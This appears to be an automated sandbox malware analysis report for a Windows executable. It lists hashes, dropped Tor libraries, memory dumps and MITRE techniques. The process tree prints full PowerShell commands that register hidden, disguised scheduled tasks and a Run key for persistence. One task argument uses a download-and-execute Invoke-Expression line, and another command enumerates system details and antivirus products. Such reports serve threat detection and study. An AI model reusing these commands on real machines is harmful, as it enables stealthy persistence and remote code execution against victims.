0a9842012b7dd8744d6777959fa9819b2cdfcb09daf4fc44f7fb8d218719bedf

Analysis

max time kernel
146s
max time network
166s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25/09/2022, 16:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dc5df355c239aa89bab0a5b094e78c51.exe
Size

6.1MB
MD5

dc5df355c239aa89bab0a5b094e78c51
SHA1

73363a25a4b675d81f6f683e06ed627edffb39a3
SHA256

0a9842012b7dd8744d6777959fa9819b2cdfcb09daf4fc44f7fb8d218719bedf
SHA512

57e955936c8ff35b745cc644ce30b79a50d13d1fdcb33ca2e9e0231a6d5e9edb812f7f11cfc391d6b9eba151988d603632cbf19141693b453d81b0f3a58698f5
SSDEEP

196608:JyeOo5JG/pujQOpUgUBUDOT+OP+Tx+4TG/+:JyeOo5JGRujOlzJq+8

Score

8^/10

persistence

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
2272	orion.exe
4908	orion.exe
2396	orion.exe

Loads dropped DLL 5 IoCs

pid	Process
2272	orion.exe
2272	orion.exe
2272	orion.exe
2272	orion.exe
2272	orion.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JavaInvoker = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\.NET\\orion.exe\" /startup"	dc5df355c239aa89bab0a5b094e78c51.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	api.ipify.org
25	api.ipify.org

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4764	powershell.exe
4764	powershell.exe
4176	powershell.exe
4176	powershell.exe
2272	orion.exe
2272	orion.exe
2272	orion.exe
2272	orion.exe
3980	powershell.exe
3980	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeIncreaseQuotaPrivilege	4764	powershell.exe
Token: SeSecurityPrivilege	4764	powershell.exe
Token: SeTakeOwnershipPrivilege	4764	powershell.exe
Token: SeLoadDriverPrivilege	4764	powershell.exe
Token: SeSystemProfilePrivilege	4764	powershell.exe
Token: SeSystemtimePrivilege	4764	powershell.exe
Token: SeProfSingleProcessPrivilege	4764	powershell.exe
Token: SeIncBasePriorityPrivilege	4764	powershell.exe
Token: SeCreatePagefilePrivilege	4764	powershell.exe
Token: SeBackupPrivilege	4764	powershell.exe
Token: SeRestorePrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeSystemEnvironmentPrivilege	4764	powershell.exe
Token: SeRemoteShutdownPrivilege	4764	powershell.exe
Token: SeUndockPrivilege	4764	powershell.exe
Token: SeManageVolumePrivilege	4764	powershell.exe
Token: 33	4764	powershell.exe
Token: 34	4764	powershell.exe
Token: 35	4764	powershell.exe
Token: 36	4764	powershell.exe
Token: SeIncreaseQuotaPrivilege	4764	powershell.exe
Token: SeSecurityPrivilege	4764	powershell.exe
Token: SeTakeOwnershipPrivilege	4764	powershell.exe
Token: SeLoadDriverPrivilege	4764	powershell.exe
Token: SeSystemProfilePrivilege	4764	powershell.exe
Token: SeSystemtimePrivilege	4764	powershell.exe
Token: SeProfSingleProcessPrivilege	4764	powershell.exe
Token: SeIncBasePriorityPrivilege	4764	powershell.exe
Token: SeCreatePagefilePrivilege	4764	powershell.exe
Token: SeBackupPrivilege	4764	powershell.exe
Token: SeRestorePrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeSystemEnvironmentPrivilege	4764	powershell.exe
Token: SeRemoteShutdownPrivilege	4764	powershell.exe
Token: SeUndockPrivilege	4764	powershell.exe
Token: SeManageVolumePrivilege	4764	powershell.exe
Token: 33	4764	powershell.exe
Token: 34	4764	powershell.exe
Token: 35	4764	powershell.exe
Token: 36	4764	powershell.exe
Token: SeIncreaseQuotaPrivilege	4764	powershell.exe
Token: SeSecurityPrivilege	4764	powershell.exe
Token: SeTakeOwnershipPrivilege	4764	powershell.exe
Token: SeLoadDriverPrivilege	4764	powershell.exe
Token: SeSystemProfilePrivilege	4764	powershell.exe
Token: SeSystemtimePrivilege	4764	powershell.exe
Token: SeProfSingleProcessPrivilege	4764	powershell.exe
Token: SeIncBasePriorityPrivilege	4764	powershell.exe
Token: SeCreatePagefilePrivilege	4764	powershell.exe
Token: SeBackupPrivilege	4764	powershell.exe
Token: SeRestorePrivilege	4764	powershell.exe
Token: SeShutdownPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeSystemEnvironmentPrivilege	4764	powershell.exe
Token: SeRemoteShutdownPrivilege	4764	powershell.exe
Token: SeUndockPrivilege	4764	powershell.exe
Token: SeManageVolumePrivilege	4764	powershell.exe
Token: 33	4764	powershell.exe
Token: 34	4764	powershell.exe
Token: 35	4764	powershell.exe
Token: 36	4764	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3376 wrote to memory of 4764	3376	dc5df355c239aa89bab0a5b094e78c51.exe	80
PID 3376 wrote to memory of 4764	3376	dc5df355c239aa89bab0a5b094e78c51.exe	80
PID 3376 wrote to memory of 4764	3376	dc5df355c239aa89bab0a5b094e78c51.exe	80
PID 3376 wrote to memory of 4176	3376	dc5df355c239aa89bab0a5b094e78c51.exe	87
PID 3376 wrote to memory of 4176	3376	dc5df355c239aa89bab0a5b094e78c51.exe	87
PID 3376 wrote to memory of 4176	3376	dc5df355c239aa89bab0a5b094e78c51.exe	87
PID 3376 wrote to memory of 2272	3376	dc5df355c239aa89bab0a5b094e78c51.exe	91
PID 3376 wrote to memory of 2272	3376	dc5df355c239aa89bab0a5b094e78c51.exe	91
PID 3376 wrote to memory of 2272	3376	dc5df355c239aa89bab0a5b094e78c51.exe	91
PID 2272 wrote to memory of 3980	2272	orion.exe	93
PID 2272 wrote to memory of 3980	2272	orion.exe	93
PID 2272 wrote to memory of 3980	2272	orion.exe	93

C:\Users\Admin\AppData\Local\Temp\dc5df355c239aa89bab0a5b094e78c51.exe
"C:\Users\Admin\AppData\Local\Temp\dc5df355c239aa89bab0a5b094e78c51.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3376
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe' -Argument '/persistence' -WorkingDirectory 'C:\Users\Admin\AppData\Local\Temp\.NET\'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -Hidden -StartWhenAvailable; Register-ScheduledTask -TaskName 'JDebug' -Action $Action -Trigger $Trigger -Settings $Settings -Description 'Java Interface Invoker'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe' -Argument '-Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('')"' -WorkingDirectory 'C:\Users\Admin\AppData\Local\Temp\.NET\'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Days 30); $Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -Hidden -StartWhenAvailable; Register-ScheduledTask -TaskName 'SystemMaintenance' -Action $Action -Trigger $Trigger -Settings $Settings -Description 'Java Interface Invoker'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4176
- C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe
  C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe /wait /delete "C:\Users\Admin\AppData\Local\Temp\dc5df355c239aa89bab0a5b094e78c51.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Get-CimInstance -ClassName Win32_OperatingSystem | Select -Property CSName,RegisteredUser,Organization,Caption,OSArchitecture,InstallDate,TotalVisibleMemorySize; Get-CimInstance -ClassName Win32_VideoController | Select -Property Name; Get-CimInstance -ClassName Win32_Processor | Select -Property Name,NumberOfCores; Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select -Property displayName,productState"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3980

C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe
C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe /persistence
1⤵
- Executes dropped EXE
PID:4908

C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe
C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe /persistence
1⤵
- Executes dropped EXE
PID:2396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
21f0905ffdccf0e117134ee60f913ea3

SHA1
76098b12181d462022310fa2bc89fb4ed4d3cd1d

SHA256
a674b8249def3ba7c2167e6edfecf0788cf6dcc4bd5816a2e0120a6fd0247a26

SHA512
93332e0da35891f6fa515badc969c116601ab041c0b1621acb2563aa58727d56a28619b03835552fac9751e27acb08354439588f26c6f5c5b00ecf018f5cf912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
71881dd76a664620f87a813e01d67cce

SHA1
abc9e922b09859d77d100ce67a2e192deb257975

SHA256
e845d402adbf29cc6fbdb4e5676fe31c3bec532989dbe03f1a62a47960768f17

SHA512
24d6b9100a3d3ab70db879ec5f9931cb09fbe70aa5ad6708e3778f3fea9f2b5c4c053feed1fd3b963f22b361ee732ed8d50230c9f465edb052b62ddd7f2613a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Config.ini

Filesize
439B

MD5
aef45cd969123c37d90de8fc57ffc1e8

SHA1
75682681aff21182f2d1b16e299d9fe5d3f678fc

SHA256
24f09729a1198a9186cbe6b7990a9249a276264759dfabac4f9a18d5cb4b686c

SHA512
df38fbd0b009c61b46aa0e74316f799c10d0e45b46dc156524bcf3aec3876f7508e421870c753046f782e86a1f967e450aaaf3baba0bdcf6b41d34900f8ce5c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libeay32.dll

Filesize
2.5MB

MD5
c9bbba92e2717bffc8ef75d3af8b296e

SHA1
0836bccdc54132ad4698d0cccd7d1a1de85440b9

SHA256
f1e2bc9059a8a88027ccb2684ecf4a064176462496d79bb35d2b69a95d9fcef3

SHA512
2762d3c31cd568427b82bc925401491281777fff359262c2ccedec7409828431d2dc7e410e0ac287aebb0da0534bd3031037e7626e9bc6bcba9b42be483b2c3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libeay32.dll

Filesize
2.5MB

MD5
c9bbba92e2717bffc8ef75d3af8b296e

SHA1
0836bccdc54132ad4698d0cccd7d1a1de85440b9

SHA256
f1e2bc9059a8a88027ccb2684ecf4a064176462496d79bb35d2b69a95d9fcef3

SHA512
2762d3c31cd568427b82bc925401491281777fff359262c2ccedec7409828431d2dc7e410e0ac287aebb0da0534bd3031037e7626e9bc6bcba9b42be483b2c3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libgcc_s_sjlj-1.dll

Filesize
968KB

MD5
ec27d495bd75f4cf95bc4f8e5a183c93

SHA1
0b1540a3c18b33be604a0f3bd1cf7cace521c778

SHA256
f374f6f3c6c6a82a43ac3941aeeedbdd0428081ad0c296d75d03fce736202c7d

SHA512
6b2e5747c128f2d6bf526345f252dade00dfe84980059114b9aad12c8b53e9e4192e6a007ace3b4598803547ddf1f3e17ee6d4491b48e404ca00602e1ff0a179

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libgcc_s_sjlj-1.dll

Filesize
968KB

MD5
ec27d495bd75f4cf95bc4f8e5a183c93

SHA1
0b1540a3c18b33be604a0f3bd1cf7cace521c778

SHA256
f374f6f3c6c6a82a43ac3941aeeedbdd0428081ad0c296d75d03fce736202c7d

SHA512
6b2e5747c128f2d6bf526345f252dade00dfe84980059114b9aad12c8b53e9e4192e6a007ace3b4598803547ddf1f3e17ee6d4491b48e404ca00602e1ff0a179

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libssp-0.dll

Filesize
272KB

MD5
0989c27514e64873f277e2b585a9af6c

SHA1
c8e53889f2ad2d7f22252ebef52b96c87883444d

SHA256
b65422fbdadf1ab7bc5029a94bb00641317b344523769dfdfecd9c6fbcfdea96

SHA512
f9c3a18a32724829ffb8ba6b10cb77ea64f67f9d9367e6f879a552fd7803041356aedbb2a706a245cb8fc635f1afd3a5a9a0a4f0825de21fb8edc5cf1f1a3198

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libssp-0.dll

Filesize
272KB

MD5
0989c27514e64873f277e2b585a9af6c

SHA1
c8e53889f2ad2d7f22252ebef52b96c87883444d

SHA256
b65422fbdadf1ab7bc5029a94bb00641317b344523769dfdfecd9c6fbcfdea96

SHA512
f9c3a18a32724829ffb8ba6b10cb77ea64f67f9d9367e6f879a552fd7803041356aedbb2a706a245cb8fc635f1afd3a5a9a0a4f0825de21fb8edc5cf1f1a3198

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libwinpthread-1.dll

Filesize
500KB

MD5
5d87b188254c4c82edbd095e4412c24d

SHA1
3a908161025f652bef53c98d9b53c3381850be5d

SHA256
2d4e700fb217cb63a7da757cc3df18cb8fb644dff39506f15e1103d73bf8d681

SHA512
582cc031b3bad757403f29eff90cc66c208a782e480006b4bb5eedaa11d678ffdc22486ea9e7266ff60af1acf7e73be3b6edd1e3228badb033fae4e896f104a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\libwinpthread-1.dll

Filesize
500KB

MD5
5d87b188254c4c82edbd095e4412c24d

SHA1
3a908161025f652bef53c98d9b53c3381850be5d

SHA256
2d4e700fb217cb63a7da757cc3df18cb8fb644dff39506f15e1103d73bf8d681

SHA512
582cc031b3bad757403f29eff90cc66c208a782e480006b4bb5eedaa11d678ffdc22486ea9e7266ff60af1acf7e73be3b6edd1e3228badb033fae4e896f104a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\ssleay32.dll

Filesize
770KB

MD5
07ff8f980dd3939ffac23a8bd4ae1564

SHA1
69d487d4a1de566b54a457d8d263a891f6c4a6f2

SHA256
8e832e363a336399e129ddec16cff52fdf7297e98c7b85cf3371fc33eeb5aded

SHA512
87b0ebad59bc1097bef8d3339474576b5c05cb8efc2ddff74645c89611f3a6b33fc09ed1db57e16813a7865588b690e4f5dd9f3e76a59825ce60d62c8769f63f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\Tor\ssleay32.dll

Filesize
770KB

MD5
07ff8f980dd3939ffac23a8bd4ae1564

SHA1
69d487d4a1de566b54a457d8d263a891f6c4a6f2

SHA256
8e832e363a336399e129ddec16cff52fdf7297e98c7b85cf3371fc33eeb5aded

SHA512
87b0ebad59bc1097bef8d3339474576b5c05cb8efc2ddff74645c89611f3a6b33fc09ed1db57e16813a7865588b690e4f5dd9f3e76a59825ce60d62c8769f63f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe

Filesize
6.1MB

MD5
dc5df355c239aa89bab0a5b094e78c51

SHA1
73363a25a4b675d81f6f683e06ed627edffb39a3

SHA256
0a9842012b7dd8744d6777959fa9819b2cdfcb09daf4fc44f7fb8d218719bedf

SHA512
57e955936c8ff35b745cc644ce30b79a50d13d1fdcb33ca2e9e0231a6d5e9edb812f7f11cfc391d6b9eba151988d603632cbf19141693b453d81b0f3a58698f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe

Filesize
6.1MB

MD5
dc5df355c239aa89bab0a5b094e78c51

SHA1
73363a25a4b675d81f6f683e06ed627edffb39a3

SHA256
0a9842012b7dd8744d6777959fa9819b2cdfcb09daf4fc44f7fb8d218719bedf

SHA512
57e955936c8ff35b745cc644ce30b79a50d13d1fdcb33ca2e9e0231a6d5e9edb812f7f11cfc391d6b9eba151988d603632cbf19141693b453d81b0f3a58698f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe

Filesize
6.1MB

MD5
dc5df355c239aa89bab0a5b094e78c51

SHA1
73363a25a4b675d81f6f683e06ed627edffb39a3

SHA256
0a9842012b7dd8744d6777959fa9819b2cdfcb09daf4fc44f7fb8d218719bedf

SHA512
57e955936c8ff35b745cc644ce30b79a50d13d1fdcb33ca2e9e0231a6d5e9edb812f7f11cfc391d6b9eba151988d603632cbf19141693b453d81b0f3a58698f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\.NET\orion.exe

Filesize
6.1MB

MD5
dc5df355c239aa89bab0a5b094e78c51

SHA1
73363a25a4b675d81f6f683e06ed627edffb39a3

SHA256
0a9842012b7dd8744d6777959fa9819b2cdfcb09daf4fc44f7fb8d218719bedf

SHA512
57e955936c8ff35b745cc644ce30b79a50d13d1fdcb33ca2e9e0231a6d5e9edb812f7f11cfc391d6b9eba151988d603632cbf19141693b453d81b0f3a58698f5

Download Submit
memory/2272-174-0x0000000074B50000-0x0000000074D5C000-memory.dmp

Filesize
2.0MB

Download
memory/2272-166-0x0000000074B50000-0x0000000074D5C000-memory.dmp

Filesize
2.0MB

Download
memory/2272-167-0x0000000074A70000-0x0000000074B17000-memory.dmp

Filesize
668KB

Download
memory/2272-175-0x0000000074A70000-0x0000000074B17000-memory.dmp

Filesize
668KB

Download
memory/2272-162-0x0000000074B50000-0x0000000074D5C000-memory.dmp

Filesize
2.0MB

Download
memory/2272-165-0x0000000074A70000-0x0000000074B17000-memory.dmp

Filesize
668KB

Download
memory/3980-170-0x000000006FE80000-0x000000006FECC000-memory.dmp

Filesize
304KB

Download
memory/3980-173-0x0000000070C10000-0x0000000070F64000-memory.dmp

Filesize
3.3MB

Download
memory/3980-172-0x0000000007EF0000-0x0000000007F14000-memory.dmp

Filesize
144KB

Download
memory/3980-171-0x0000000007EC0000-0x0000000007EEA000-memory.dmp

Filesize
168KB

Download
memory/4176-149-0x0000000070460000-0x00000000704AC000-memory.dmp

Filesize
304KB

Download
memory/4764-144-0x00000000071B0000-0x00000000071BA000-memory.dmp

Filesize
40KB

Download
memory/4764-136-0x0000000005220000-0x0000000005286000-memory.dmp

Filesize
408KB

Download
memory/4764-134-0x0000000005680000-0x0000000005CA8000-memory.dmp

Filesize
6.2MB

Download
memory/4764-143-0x0000000007140000-0x000000000715A000-memory.dmp

Filesize
104KB

Download
memory/4764-138-0x0000000006030000-0x000000000604E000-memory.dmp

Filesize
120KB

Download
memory/4764-133-0x00000000026F0000-0x0000000002726000-memory.dmp

Filesize
216KB

Download
memory/4764-137-0x00000000053C0000-0x0000000005426000-memory.dmp

Filesize
408KB

Download
memory/4764-145-0x0000000007610000-0x00000000076A6000-memory.dmp

Filesize
600KB

Download
memory/4764-135-0x0000000005180000-0x00000000051A2000-memory.dmp

Filesize
136KB

Download
memory/4764-142-0x0000000007A50000-0x00000000080CA000-memory.dmp

Filesize
6.5MB

Download
memory/4764-141-0x00000000065C0000-0x00000000065DE000-memory.dmp

Filesize
120KB

Download
memory/4764-140-0x0000000070460000-0x00000000704AC000-memory.dmp

Filesize
304KB

Download
memory/4764-139-0x00000000065E0000-0x0000000006612000-memory.dmp

Filesize
200KB

Download